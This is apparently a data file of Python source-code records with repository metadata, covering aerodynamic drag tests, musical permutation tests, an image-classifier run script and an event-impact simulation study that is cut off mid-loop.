print("\33[90m (\33[0m\33[93m {} \33[0m\33[90m) \33[0m".format('next'))
dictvals['nextpreviousnormal'] = "True"
with open('reddit/variables.json', 'wb') as f:
pickle.dump(dictvals,f)
f.close()
else:
print("{0:<5} \33[31m {1} \33[5m".format('', 'Enter Something To Search'))
| 58.370861
| 194
| 0.509644
| 1,870
| 17,628
| 4.781283
| 0.07754
| 0.028185
| 0.025836
| 0.033218
| 0.832905
| 0.798121
| 0.781344
| 0.781344
| 0.753943
| 0.732133
| 0
| 0.068966
| 0.325505
| 17,628
| 301
| 195
| 58.564784
| 0.683011
| 0.001191
| 0
| 0.690909
| 0
| 0.054545
| 0.251903
| 0.020561
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025455
| false
| 0
| 0.018182
| 0
| 0.047273
| 0.196364
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48977ea5dec7bd2f371edfa2689770459494abf2
| 43
|
py
|
Python
|
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | null | null | null |
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | 4
|
2015-12-13T10:39:31.000Z
|
2018-11-30T00:58:08.000Z
|
socketlabs/__init__.py
|
MattHealy/socketlabs-python
|
890647cc0cd952ed1a52bdd96f7e9dd8c28810c9
|
[
"MIT"
] | null | null | null |
from . socketlabs import SocketLabs # noqa
| 21.5
| 42
| 0.790698
| 5
| 43
| 6.8
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162791
| 43
| 1
| 43
| 43
| 0.944444
| 0.093023
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
489e4a2d386d8c1a809a3799fd4b2d3bb012eff1
| 2,204
|
py
|
Python
|
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | 4
|
2020-09-15T23:24:15.000Z
|
2021-01-11T19:59:39.000Z
|
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | null | null | null |
openaerostruct/aerodynamics/tests/test_viscous_drag.py
|
EricUrbineer/OpenAeroStruct
|
26c37a0e86074517680405687824e27b3b2caaec
|
[
"Apache-2.0"
] | 2
|
2020-08-25T16:38:14.000Z
|
2020-12-03T09:49:45.000Z
|
import unittest
from openaerostruct.aerodynamics.viscous_drag import ViscousDrag
from openaerostruct.utils.testing import run_test, get_default_surfaces
from openmdao.api import Group, IndepVarComp, BsplinesComp
import numpy as np
class Test(unittest.TestCase):
def test(self):
surface = get_default_surfaces()[0]
surface['t_over_c_cp'] = np.array([0.1, 0.15, 0.2])
nx = surface['mesh'].shape[0]
ny = surface['mesh'].shape[1]
n_cp = len(surface['t_over_c_cp'])
group = Group()
indep_var_comp = IndepVarComp()
indep_var_comp.add_output('t_over_c_cp', val=surface['t_over_c_cp'])
group.add_subsystem('indep_var_comp', indep_var_comp, promotes=['*'])
group.add_subsystem('t_over_c_bsp', BsplinesComp(
in_name='t_over_c_cp', out_name='t_over_c',
num_control_points=n_cp, num_points=int(ny-1),
bspline_order=min(n_cp, 4), distribution='uniform'),
promotes_inputs=['t_over_c_cp'], promotes_outputs=['t_over_c'])
comp = ViscousDrag(surface=surface, with_viscous=True)
group.add_subsystem('viscousdrag', comp, promotes=['*'])
run_test(self, group, complex_flag=True)
def test_2(self):
surface = get_default_surfaces()[0]
surface['k_lam'] = .5
nx = surface['mesh'].shape[0]
ny = surface['mesh'].shape[1]
n_cp = len(surface['t_over_c_cp'])
group = Group()
indep_var_comp = IndepVarComp()
indep_var_comp.add_output('t_over_c_cp', val=surface['t_over_c_cp'])
group.add_subsystem('indep_var_comp', indep_var_comp, promotes=['*'])
group.add_subsystem('t_over_c_bsp', BsplinesComp(
in_name='t_over_c_cp', out_name='t_over_c',
num_control_points=n_cp, num_points=int(ny-1),
bspline_order=min(n_cp, 4), distribution='uniform'),
promotes_inputs=['t_over_c_cp'], promotes_outputs=['t_over_c'])
comp = ViscousDrag(surface=surface, with_viscous=True)
group.add_subsystem('viscousdrag', comp, promotes=['*'])
run_test(self, group, complex_flag=True)
if __name__ == '__main__':
unittest.main()
| 35.548387
| 77
| 0.65608
| 307
| 2,204
| 4.32899
| 0.247557
| 0.063958
| 0.076749
| 0.066215
| 0.790068
| 0.784048
| 0.784048
| 0.728367
| 0.728367
| 0.728367
| 0
| 0.010901
| 0.209165
| 2,204
| 61
| 78
| 36.131148
| 0.751578
| 0
| 0
| 0.727273
| 0
| 0
| 0.124319
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.113636
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
48a609fb12f8d8c4bbc48328fd289fffc7608961
| 5,776
|
py
|
Python
|
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | null | null | null |
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | 45
|
2020-02-24T19:37:00.000Z
|
2021-04-06T16:13:56.000Z
|
tests/permutation/test_permutation.py
|
alexgorji/musurgia
|
81d37afbf1ac70348002a93299db228b5ed4a591
|
[
"MIT"
] | null | null | null |
from unittest import TestCase
from musurgia.permutation import LimitedPermutation, self_permute, get_self_multiplied_permutation, \
get_reordered_self_multiplied_permutation, get_vertical_self_multiplied_permutation
class Test(TestCase):
def test_1_1(self):
permutation_order = [3, 1, 2]
self_permutation = self_permute(permutation_order)
result = [[3, 1, 2], [2, 3, 1], [1, 2, 3]]
self.assertEqual(result, self_permutation)
def test_1_2(self):
permutation_order = [3, 1, 2]
self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
result = [[[1, 2, 3], [3, 1, 2], [2, 3, 1]],
[[2, 3, 1], [1, 2, 3], [3, 1, 2]],
[[3, 1, 2], [2, 3, 1], [1, 2, 3]]]
self.assertEqual(result, self_multiplied_permutation)
def test_1_3(self):
permutation_order = [3, 1, 2]
reordered_self_multiplied_permutation = get_reordered_self_multiplied_permutation(permutation_order)
result = [[[3, 1, 2], [2, 3, 1], [1, 2, 3]],
[[1, 2, 3], [3, 1, 2], [2, 3, 1]],
[[2, 3, 1], [1, 2, 3], [3, 1, 2]]]
self.assertEqual(result, reordered_self_multiplied_permutation)
def test_1_4(self):
permutation_order = [3, 1, 2]
vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
result = [[[1, 3, 2], [2, 1, 3], [3, 2, 1]],
[[2, 1, 3], [3, 2, 1], [1, 3, 2]],
[[3, 2, 1], [1, 3, 2], [2, 1, 3]]]
self.assertEqual(result, vertical_self_multiplied_permutation)
def test_2_1(self):
perm = LimitedPermutation(['a', 'b', 'c'], [3, 1, 2], multi=[1, 1])
result = [[3, 1, 2], [2, 3, 1], [1, 2, 3], [1, 2, 3], [3, 1, 2], [2, 3, 1], [2, 3, 1], [1, 2, 3], [3, 1, 2]]
self.assertEqual(result, perm.multiplied_orders)
def test_2_2(self):
perm = LimitedPermutation(['a', 'b', 'c'], [3, 1, 2], multi=[1, 1], reading_direction='vertical')
result = [[1, 3, 2], [2, 1, 3], [3, 2, 1], [2, 1, 3], [3, 2, 1], [1, 3, 2], [3, 2, 1], [1, 3, 2], [2, 1, 3]]
self.assertEqual(result, perm.multiplied_orders)
def test_3_1(self):
permutation_order = [3, 4, 2, 1]
self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
result = [[[4, 3, 1, 2], [1, 2, 3, 4], [2, 1, 4, 3], [3, 4, 2, 1]],
[[2, 1, 4, 3], [3, 4, 2, 1], [1, 2, 3, 4], [4, 3, 1, 2]],
[[1, 2, 3, 4], [4, 3, 1, 2], [3, 4, 2, 1], [2, 1, 4, 3]],
[[3, 4, 2, 1], [2, 1, 4, 3], [4, 3, 1, 2], [1, 2, 3, 4]]]
self.assertEqual(result, self_multiplied_permutation)
def test_3_2(self):
permutation_order = [3, 4, 2, 1]
reordered_self_multiplied_permutation = get_reordered_self_multiplied_permutation(permutation_order)
result = [[[3, 4, 2, 1], [2, 1, 4, 3], [4, 3, 1, 2], [1, 2, 3, 4]],
[[4, 3, 1, 2], [1, 2, 3, 4], [2, 1, 4, 3], [3, 4, 2, 1]],
[[2, 1, 4, 3], [3, 4, 2, 1], [1, 2, 3, 4], [4, 3, 1, 2]],
[[1, 2, 3, 4], [4, 3, 1, 2], [3, 4, 2, 1], [2, 1, 4, 3]]]
self.assertEqual(result, reordered_self_multiplied_permutation)
def test_3_3(self):
permutation_order = [3, 4, 2, 1]
vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
result = [[[4, 1, 2, 3], [3, 2, 1, 4], [1, 3, 4, 2], [2, 4, 3, 1]],
[[2, 3, 1, 4], [1, 4, 2, 3], [4, 2, 3, 1], [3, 1, 4, 2]],
[[1, 4, 3, 2], [2, 3, 4, 1], [3, 1, 2, 4], [4, 2, 1, 3]],
[[3, 2, 4, 1], [4, 1, 3, 2], [2, 4, 1, 3], [1, 3, 2, 4]]]
self.assertEqual(result, vertical_self_multiplied_permutation)
def test_4_1(self):
permutation_order = [4, 3, 2, 1]
self_multiplied_permutation = get_self_multiplied_permutation(permutation_order)
result = [[[1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1]],
[[4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4]],
[[1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1]],
[[4, 3, 2, 1], [1, 2, 3, 4], [4, 3, 2, 1], [1, 2, 3, 4]]]
self.assertEqual(result, self_multiplied_permutation)
def test_4_2(self):
permutation_order = [4, 3, 2, 1]
vertical_self_multiplied_permutation = get_vertical_self_multiplied_permutation(permutation_order)
result = [[[1, 4, 1, 4], [2, 3, 2, 3], [3, 2, 3, 2], [4, 1, 4, 1]],
[[4, 1, 4, 1], [3, 2, 3, 2], [2, 3, 2, 3], [1, 4, 1, 4]],
[[1, 4, 1, 4], [2, 3, 2, 3], [3, 2, 3, 2], [4, 1, 4, 1]],
[[4, 1, 4, 1], [3, 2, 3, 2], [2, 3, 2, 3], [1, 4, 1, 4]]]
self.assertEqual(result, vertical_self_multiplied_permutation)
def test_5(self):
size = 3
tree_permutation_order = (3, 1, 2)
multi = (3, 4)
permutation = LimitedPermutation(input_list=list(range(1, size + 1)),
main_permutation_order=tree_permutation_order,
multi=multi)
result = permutation.multi
expected = (1, 1)
self.assertEqual(expected, result)
def test_6(self):
size = 3
tree_permutation_order = (3, 1, 2)
multi = (2, 4)
permutation = LimitedPermutation(input_list=list(range(1, size + 1)),
main_permutation_order=tree_permutation_order,
multi=multi)
result = permutation.multi
expected = (3, 1)
self.assertEqual(expected, result)
| 49.367521
| 116
| 0.505194
| 875
| 5,776
| 3.169143
| 0.045714
| 0.048323
| 0.036783
| 0.025965
| 0.916336
| 0.888208
| 0.863686
| 0.804904
| 0.739993
| 0.688424
| 0
| 0.13726
| 0.306267
| 5,776
| 116
| 117
| 49.793103
| 0.554779
| 0
| 0
| 0.438776
| 0
| 0
| 0.002424
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 1
| 0.132653
| false
| 0
| 0.020408
| 0
| 0.163265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d28ca8914568a48d0eb5e60447bd90c6dcbfb22c
| 1,084
|
py
|
Python
|
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
run_models.py
|
AineKiraboMbabazi/AIPND_Image_Classifier
|
7289adc5f1e811bf09144bd31dbb7c010a27dbc5
|
[
"MIT"
] | null | null | null |
#!/bin/sh
# */home/workspace/Image classifier/run_models.sh
#
# PROGRAMMER: Ainekirabo Mbabazi
# DATE CREATED: 06/12/2019
# PURPOSE: Runs all three models
#
#
# Usage: sh run_models.sh -- will run program from commandline
#
python train.py flowers --save_dir checkpoint.pth --arch vgg13 --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint.pth --top_k 5 --category_names cat_to_name.json --gpu
python train.py flowers --save_dir checkpoint_1.pth --arch 'densenet201' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_1.pth --top_k 5 --category_names cat_to_name.json --gpu
python train.py flowers --save_dir checkpoint_.pth --arch 'alexnet' --learning_rate 0.001 --hidden_units 1000 --epochs 5 --gpu
python predict.py 'flowers/test/28/image_05230.jpg' checkpoint_.pth --top_k 5 --category_names cat_to_name.json --gpu
| 57.052632
| 133
| 0.678967
| 157
| 1,084
| 4.496815
| 0.388535
| 0.076487
| 0.055241
| 0.084986
| 0.725212
| 0.725212
| 0.725212
| 0.725212
| 0.725212
| 0.652975
| 0
| 0.076923
| 0.208487
| 1,084
| 18
| 134
| 60.222222
| 0.745921
| 0.292435
| 0
| 0
| 0
| 0
| 0.14702
| 0.123179
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d2caaf77625cd0b2e6d2c8c0bdeab17a71079193
| 111
|
py
|
Python
|
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | null | null | null |
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | 8
|
2021-10-13T02:33:23.000Z
|
2022-03-29T21:01:08.000Z
|
calculation/gmhazard_calc/gmhazard_calc/im/__init__.py
|
ucgmsim/gmhazard
|
d3d90b4c94b3d9605597a3efeccc8523a1e50c0e
|
[
"MIT"
] | null | null | null |
from .IM import IM, IMType, IMComponent, to_string_list, to_im_list, IM_COMPONENT_MAPPING, DEFAULT_PSA_PERIODS
| 55.5
| 110
| 0.846847
| 18
| 111
| 4.777778
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09009
| 111
| 1
| 111
| 111
| 0.851485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
961262872db068a55a767058c77c17b5924c7223
| 17,466
|
py
|
Python
|
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | 2
|
2020-05-21T11:53:20.000Z
|
2020-11-01T06:12:49.000Z
|
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | null | null | null |
simulations.py
|
diozaka/eitest
|
b2c37ad93e7760673a2f46279f913bd03440a8f2
|
[
"MIT"
] | null | null | null |
import sys
import numpy as np
import numba
import eitest
if len(sys.argv) != 5:
print(f'USAGE: {sys.argv[0]} eager|lazy instant|causal tt|ks|mmd none|bonferroni|sidak|holm|hochberg|simes')
sys.exit(1)
# command line parameters
sample_method = sys.argv[1]
instantaneous = (sys.argv[2] == 'instant')
twosamp_test = sys.argv[3]
multi_test = sys.argv[4]
# other global parameters
default_T = 8192
n_pairs = 100
alpha = 0.05
lag_cutoff = 32
@numba.njit
def event_series_bernoulli(series_length, event_count):
'''Generate an iid Bernoulli distributed event series.
series_length: length of the event series
event_count: number of events'''
event_series = np.zeros(series_length)
event_series[np.random.choice(np.arange(0, series_length), event_count, replace=False)] = 1
return event_series
@numba.njit
def time_series_mean_impact(event_series, order, signal_to_noise):
'''Generate a time series with impacts in mean as described in the paper.
The impact weights are sampled iid from N(0, signal_to_noise),
and additional noise is sampled iid from N(0,1). The detection problem will
be harder than in time_series_meanconst_impact for small orders, as for small
orders we have a low probability to sample at least one impact weight with a
high magnitude. On the other hand, since the impact is different at every lag,
we can detect the impacts even if the order is larger than the max_lag value
used in the test.
event_series: input of shape (T,) with event occurrences
order: order of the event impacts
signal_to_noise: signal to noise ratio of the event impacts'''
series_length = len(event_series)
weights = np.random.randn(order)*np.sqrt(signal_to_noise)
time_series = np.random.randn(series_length)
for t in range(series_length):
if event_series[t] == 1:
time_series[t+1:t+order+1] += weights[:order-max(0, (t+order+1)-series_length)]
return time_series
@numba.njit
def time_series_meanconst_impact(event_series, order, const):
'''Generate a time series with impacts in mean by adding a constant.
Better for comparing performance across different impact orders, since the
magnitude of the impact will always be the same.
event_series: input of shape (T,) with event occurrences
order: order of the event impacts
const: constant for mean shift'''
series_length = len(event_series)
time_series = np.random.randn(series_length)
for t in range(series_length):
if event_series[t] == 1:
time_series[t+1:t+order+1] += const
return time_series
@numba.njit
def time_series_var_impact(event_series, order, variance):
'''Generate a time series with impacts in variance as described in the paper.
event_series: input of shape (T,) with event occurrences
order: order of the event impacts
variance: variance under event impacts'''
series_length = len(event_series)
time_series = np.random.randn(series_length)
for t in range(series_length):
if event_series[t] == 1:
for tt in range(t+1, min(series_length, t+order+1)):
time_series[tt] = np.random.randn()*np.sqrt(variance)
return time_series
@numba.njit
def time_series_tail_impact(event_series, order, dof):
'''Generate a time series with impacts in tails as described in the paper.
event_series: input of shape (T,) with event occurrences
order: delay of the event impacts
dof: degrees of freedom of the t distribution'''
series_length = len(event_series)
time_series = np.random.randn(series_length)*np.sqrt(dof/(dof-2))
for t in range(series_length):
if event_series[t] == 1:
for tt in range(t+1, min(series_length, t+order+1)):
time_series[tt] = np.random.standard_t(dof)
return time_series
def test_simul_pairs(impact_model, param_T, param_N, param_q, param_r,
n_pairs, lag_cutoff, instantaneous, sample_method,
twosamp_test, multi_test, alpha):
true_positive = 0.
false_positive = 0.
for _ in range(n_pairs):
es = event_series_bernoulli(param_T, param_N)
if impact_model == 'mean':
ts = time_series_mean_impact(es, param_q, param_r)
elif impact_model == 'meanconst':
ts = time_series_meanconst_impact(es, param_q, param_r)
elif impact_model == 'var':
ts = time_series_var_impact(es, param_q, param_r)
elif impact_model == 'tail':
ts = time_series_tail_impact(es, param_q, param_r)
else:
raise ValueError('impact_model must be "mean", "meanconst", "var" or "tail"')
# coupled pair
samples = eitest.obtain_samples(es, ts, lag_cutoff=lag_cutoff,
method=sample_method,
instantaneous=instantaneous,
sort=(twosamp_test == 'ks')) # samples need to be sorted for K-S test
tstats, pvals = eitest.pairwise_twosample_tests(samples, twosamp_test, min_pts=2)
pvals_adj = eitest.multitest(np.sort(pvals[~np.isnan(pvals)]), multi_test)
true_positive += (pvals_adj.min() < alpha)
# uncoupled pair
samples = eitest.obtain_samples(np.random.permutation(es), ts, lag_cutoff=lag_cutoff,
method=sample_method,
instantaneous=instantaneous,
sort=(twosamp_test == 'ks'))
tstats, pvals = eitest.pairwise_twosample_tests(samples, twosamp_test, min_pts=2)
pvals_adj = eitest.multitest(np.sort(pvals[~np.isnan(pvals)]), multi_test)
false_positive += (pvals_adj.min() < alpha)
return true_positive/n_pairs, false_positive/n_pairs
# ## Mean impact model
default_N = 64
default_r = 1.
default_q = 4
# ### ... by number of events
vals = [4, 8, 16, 32, 64, 128, 256]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='mean', param_T=default_T,
param_N=val, param_q=default_q, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# mean impact model (T={default_T}, q={default_q}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# N\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by impact order
vals = [1, 2, 4, 8, 16, 32]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='mean', param_T=default_T,
param_N=default_N, param_q=val, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# mean impact model (T={default_T}, N={default_N}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# q\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by signal-to-noise ratio
vals = [1./32, 1./16, 1./8, 1./4, 1./2, 1., 2., 4.]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='mean', param_T=default_T,
param_N=default_N, param_q=default_q, param_r=val,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# mean impact model (T={default_T}, N={default_N}, q={default_q}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# r\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ## Meanconst impact model
default_N = 64
default_r = 0.5
default_q = 4
# ### ... by number of events
vals = [4, 8, 16, 32, 64, 128, 256]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='meanconst', param_T=default_T,
param_N=val, param_q=default_q, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# meanconst impact model (T={default_T}, q={default_q}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# N\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by impact order
vals = [1, 2, 4, 8, 16, 32]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='meanconst', param_T=default_T,
param_N=default_N, param_q=val, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# meanconst impact model (T={default_T}, N={default_N}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# q\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by mean value
vals = [0.125, 0.25, 0.5, 1, 2]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='meanconst', param_T=default_T,
param_N=default_N, param_q=default_q, param_r=val,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# meanconst impact model (T={default_T}, N={default_N}, q={default_q}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# r\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ## Variance impact model
# In the paper, we show results with the variance impact model parametrized by the **variance increase**. Here we directly modulate the variance.
default_N = 64
default_r = 8.
default_q = 4
# ### ... by number of events
vals = [4, 8, 16, 32, 64, 128, 256]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='var', param_T=default_T,
param_N=val, param_q=default_q, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# var impact model (T={default_T}, q={default_q}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# N\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by impact order
vals = [1, 2, 4, 8, 16, 32]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='var', param_T=default_T,
param_N=default_N, param_q=val, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# var impact model (T={default_T}, N={default_N}, r={default_r}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# q\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ### ... by variance
vals = [2., 4., 8., 16., 32.]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='var', param_T=default_T,
param_N=default_N, param_q=default_q, param_r=val,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
print(f'# var impact model (T={default_T}, N={default_N}, q={default_q}, n_pairs={n_pairs}, cutoff={lag_cutoff}, instantaneous={instantaneous}, alpha={alpha}, {sample_method}-{twosamp_test}-{multi_test})')
print(f'# r\ttpr\tfpr')
for i, (tpr, fpr) in enumerate(zip(tprs, fprs)):
print(f'{vals[i]}\t{tpr}\t{fpr}')
print()
# ## Tail impact model
default_N = 512
default_r = 3.
default_q = 4
# ### ... by number of events
vals = [64, 128, 256, 512, 1024]
tprs = np.empty(len(vals))
fprs = np.empty(len(vals))
for i, val in enumerate(vals):
tprs[i], fprs[i] = test_simul_pairs(impact_model='tail', param_T=default_T,
param_N=val, param_q=default_q, param_r=default_r,
n_pairs=n_pairs, sample_method=sample_method,
lag_cutoff=lag_cutoff, instantaneous=instantaneous,
twosamp_test=twosamp_test, multi_test=multi_test, alpha=alpha)
